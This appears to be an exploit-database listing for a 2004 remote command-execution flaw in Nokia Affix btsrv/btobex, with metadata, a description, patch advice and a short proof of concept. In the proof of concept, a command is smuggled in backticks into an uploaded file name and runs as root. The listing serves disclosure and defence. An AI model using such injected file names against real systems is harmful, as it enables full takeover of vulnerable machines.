header-logo
Suggest Exploit
vendor:
Affix BTSRV/BTOBS
by:
SecurityFocus
9.3
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: Affix BTSRV/BTOBS
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2004-0753
CPE: o:nokia:affix_btsrv
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2004-0753/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Unknown
2004

Nokia Affix btsrv/btobex Remote Command Execution Vulnerability

Nokia Affix btsrv/btobex are reported to be vulnerable to a remote command execution vulnerability due to a lack of input sanitization before using attacker-controlled data in a 'system()' call. An attacker can exploit this vulnerability to gain root privileges on the target computer.

Mitigation:

Users should apply the appropriate patch from the vendor.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14232/info

Nokia Affix btsrv/btobex are reported prone to a remote command execution vulnerability. The issue exists due to a lack of input sanitization that is performed before using attacker-controlled data in a 'system()' call.

Because the affected services run with superuser privileges, this issue may be exploited to fully compromise a target computer that is running the affected software.

ftp> put /etc/hosts `id`
Transfer started...
Transfer complete.
257 bytes sent in 0.9 secs (2855.56 B/s)
ftp> ls
-rwdx 257 uid=0(root) gid=0(root) groups=0(root)
Command complete.

Navigation

Suggest Exploit

Services By CQR